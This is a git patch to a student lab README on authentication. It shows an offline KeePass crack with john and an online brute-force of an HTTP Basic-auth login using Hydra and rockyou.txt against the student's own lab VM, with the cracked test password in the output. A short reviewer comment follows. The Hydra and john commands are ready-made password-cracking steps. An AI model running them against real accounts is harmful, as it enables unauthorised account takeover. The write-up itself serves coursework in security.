From d27cb057b9f2a1b79ffe80fa754ee58d99b0ec92 Mon Sep 17 00:00:00 2001 From: Manuel Thalmann Date: Fri, 15 Dec 2023 17:21:19 +0100 Subject: [PATCH] Solve `Authentication` task --- Lab 9 - Authentication/README.md | 73 ++++++++++++++++++++++++++++++++ 1 file changed, 73 insertions(+) diff --git a/Lab 9 - Authentication/README.md b/Lab 9 - Authentication/README.md index 8e0bc58..ab1a45d 100644 --- a/Lab 9 - Authentication/README.md +++ b/Lab 9 - Authentication/README.md 
@@ -27,3 +27,76 @@ john --wordlist=./rockyou.txt <(keepass2john steve_passwords.kdbx) ``` As a result, we get the password: `dancingdiva11195` + +## Online Password Cracking +This task is solved using the `heartbleed` VM from Lab 5. + +### Preparation +Look up IP address of `heartbleed` VM: + +```sh +ip address show +``` + +Add local DNS entry for `heartbleed` VM: + +```sh +echo '{ip address} heartbleed.ssb' | sudo tee --append /etc/hosts +``` + +Change Apache configuration to require login: + +```diff + + ServerAdmin webmaster@localhost + + DocumentRoot /var/www/heartbleed.ssb + ServerName heartbleed.ssb + ServerAlias www.heartbleed.ssb + SSLEngine on + SSLCertificateFile /etc/apache2/ssl/apache.crt + SSLCertificateKeyFile /etc/apache2/ssl/apache.key + ErrorLog ${APACHE_LOG_DIR}/error.log + CustomLog ${APACHE_LOG_DIR}/access.log combined ++ ++ ++ AuthType Basic ++ AuthName "Restricted Content" ++ AuthUserFile /etc/apache2/.htpasswd ++ Require valid-user ++ + +``` + +Create user login `test` with a password of your choice (the later the password occurs in `rockyou.txt`, the longer it takes to crack): + +```sh +sudo htpasswd -c /etc/apache2/.htpasswd test +``` + +Reload settings: + +```sh +service apache2 reload +``` + +### Start Cracking +Crack password using `Hydra`: + +```sh +hydra -l test -P ./rockyou.txt heartbleed.ssb https-get +``` + +Output: +``` +Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). 
+ +Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-15 17:15:46 +[WARNING] You must supply the web page as an additional option or via -m, default path set to / +[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task +[DATA] attacking http-gets://heartbleed.ssb:443/ +[STATUS] 4625.00 tries/min, 4625 tries in 00:01h, 14339773 to do in 51:41h, 16 active +[443][http-get] host: heartbleed.ssb login: test password: vendetta +1 of 1 target successfully completed, 1 valid password found +Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-15 17:18:41 +```
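Review bot: The "Reload settings" step in the Preparation section runs `service apache2 reload` without `sudo`, while the `/etc/hosts` and `htpasswd` steps before it both use `sudo`; as written the reload will fail for a non-root user, so I would change it to `sudo service apache2 reload`. In the Apache `diff` block, the lines directly before `AuthType Basic` and after `Require valid-user` are empty `+` lines, and the top and bottom of the block are blank as well, so the README does not show which container the `Auth*` directives belong to; please make sure the enclosing tags and the path they apply to are visible in the fenced block. It is also worth a short remark next to `sudo htpasswd -c /etc/apache2/.htpasswd test` that `-c` creates the file and overwrites an existing one, so a reader repeating the step to add a second user should drop `-c`.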